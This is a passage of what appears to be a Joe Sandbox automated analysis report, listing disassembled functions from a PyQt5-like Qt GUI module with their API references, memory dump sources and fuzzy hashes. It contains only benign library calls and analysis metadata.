                                                                                                                                                                                                                • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A329D2D
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
                                                                                                                                                                                                                • String ID: BEE$QPalette$brush$brush(self, cg: QPalette.ColorGroup, cr: QPalette.ColorRole) -> QBrushbrush(self, cr: QPalette.ColorRole) -> QBrush
                                                                                                                                                                                                                • API String ID: 868068763-1019518128
                                                                                                                                                                                                                • Opcode ID: 867119840c303b20faf8d7d60e1d5fe1d016ff79275cae7d2928c073b9acf2ca
                                                                                                                                                                                                                • Instruction ID: 832c301e1159577e42779cd0d40f5e96da3c2445b84cdf8cdda46e82ff95f466
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 867119840c303b20faf8d7d60e1d5fe1d016ff79275cae7d2928c073b9acf2ca
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA413FB6708B4685EB60CF21E8483A973A8FB88B84F504176DE8D47764EF7CD449C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFB9A32BA0C
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                • ?alphaMapForGlyph@QRawFont@@QEBA?AVQImage@@IW4AntialiasingType@1@AEBVQTransform@@@Z.QT5GUI ref: 00007FFB9A32BAE8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?alphaAntialiasingFont@@Glyph@Image@@Transform@@Transform@@@Type@1@malloc
                                                                                                                                                                                                                • String ID: Bu|EJ9$QRawFont$alphaMapForGlyph$alphaMapForGlyph(self, glyphIndex: int, antialiasingType: QRawFont.AntialiasingType = QRawFont.SubPixelAntialiasing, transform: QTransform = QTransform()) -> QImage
                                                                                                                                                                                                                • API String ID: 2236108326-2617967261
                                                                                                                                                                                                                • Opcode ID: b2e79b768cedeeaccc4dde49c14aaa2efe96b6fc4c9e2887c1ee0e5293eb28e5
                                                                                                                                                                                                                • Instruction ID: f53b87fe0f3164538f81bae86be0249d307c8438bf4cf2779fd0ac32045f477f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2e79b768cedeeaccc4dde49c14aaa2efe96b6fc4c9e2887c1ee0e5293eb28e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D741FD76608B86C5EB608F25F4443AAB7A8FB89B84F544176DA8C43B24DF7CD184CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFB9A347F60
                                                                                                                                                                                                                • ?toSubpathPolygons@QPainterPath@@QEBA?AV?$QList@VQPolygonF@@@@AEBVQTransform@@@Z.QT5GUI ref: 00007FFB9A347F74
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: F@@@@List@PainterPath@@PolygonPolygons@SubpathTransform@@Transform@@@malloc
                                                                                                                                                                                                                • String ID: BJ9$QPainterPath$toSubpathPolygons$toSubpathPolygons(self) -> List[QPolygonF]toSubpathPolygons(self, matrix: QTransform) -> List[QPolygonF]
                                                                                                                                                                                                                • API String ID: 4180688332-3469042540
                                                                                                                                                                                                                • Opcode ID: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                • Instruction ID: 87c7db27d2c89ed42c5abcd05b70fa7ee66d6e9f49786ed151099dd94be2fa43
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B314CB6609B8681EB60CF25E8487A973A8FB99B84F604176DE8D07364DF3CD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?remove@?$F@@@@PointVector@
                                                                                                                                                                                                                • String ID: Bii$QPolygonF$remove$remove(self, i: int)remove(self, i: int, count: int)
                                                                                                                                                                                                                • API String ID: 1048307195-760695207
                                                                                                                                                                                                                • Opcode ID: 3ebd16274e152da31aba7cbb7d918c5cd54bb37fc648e21e8f81b480778cd0a6
                                                                                                                                                                                                                • Instruction ID: e50c855c3a67d6d2bf81671359b3778cbe139651323bbdafc1c422fa3291acd0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ebd16274e152da31aba7cbb7d918c5cd54bb37fc648e21e8f81b480778cd0a6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5310BB6618B46C2EB10CF25E8885AA77B8FB88B84F604172DA8D43734DF3CD549CB40
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: List_$Size$Err_ItemLongLong_Occurred
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1563076613-0
                                                                                                                                                                                                                • Opcode ID: f6d74b0eebfb0542bff139fa9cb2c9d8bb32ddff33178bdba29a571611cfec5b
                                                                                                                                                                                                                • Instruction ID: 2ee40a7f70892ab47fc3d78f89eda669217ebd8c6c7450ca853e8700ce8528c6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6d74b0eebfb0542bff139fa9cb2c9d8bb32ddff33178bdba29a571611cfec5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9311B260B1975142EFA49B36F9041397294AF89FD0B440174EF6F53BE5DE7CD0418700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextBlockFormat$setMarker$setMarker(self, marker: QTextBlockFormat.MarkerType)
                                                                                                                                                                                                                • API String ID: 3865857979-509391100
                                                                                                                                                                                                                • Opcode ID: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                • Instruction ID: eeb4fc300c68b22fc45deabd3621c57d841308e74e3f7989ccac319773ddd74b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f756f77bb9e9d64ddbce3de738403f2ece69ad6c7bbeabd91bc8a810eb9450d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB213EB5A18F4AD1EB20CF25E88869933B8FB89784F904176CA8D43724DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Variant@@$?setFormat@@Property@TextVariant@@@
                                                                                                                                                                                                                • String ID: QTextListFormat$setStyle$setStyle(self, astyle: QTextListFormat.Style)
                                                                                                                                                                                                                • API String ID: 3865857979-247596590
                                                                                                                                                                                                                • Opcode ID: 471781f2870a4d28bdee5f554e79e13f21674235327b6f9a006b0c0fc60e2078
                                                                                                                                                                                                                • Instruction ID: d510fa2cfa807b0135c6fc4a0edfbb5d7bb1d44621a13904cad909f71160edd2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471781f2870a4d28bdee5f554e79e13f21674235327b6f9a006b0c0fc60e2078
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1214DB5A08F4AC1EB20CF25E8886A933B8FB88784F9041B6CA9D03724DF3DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
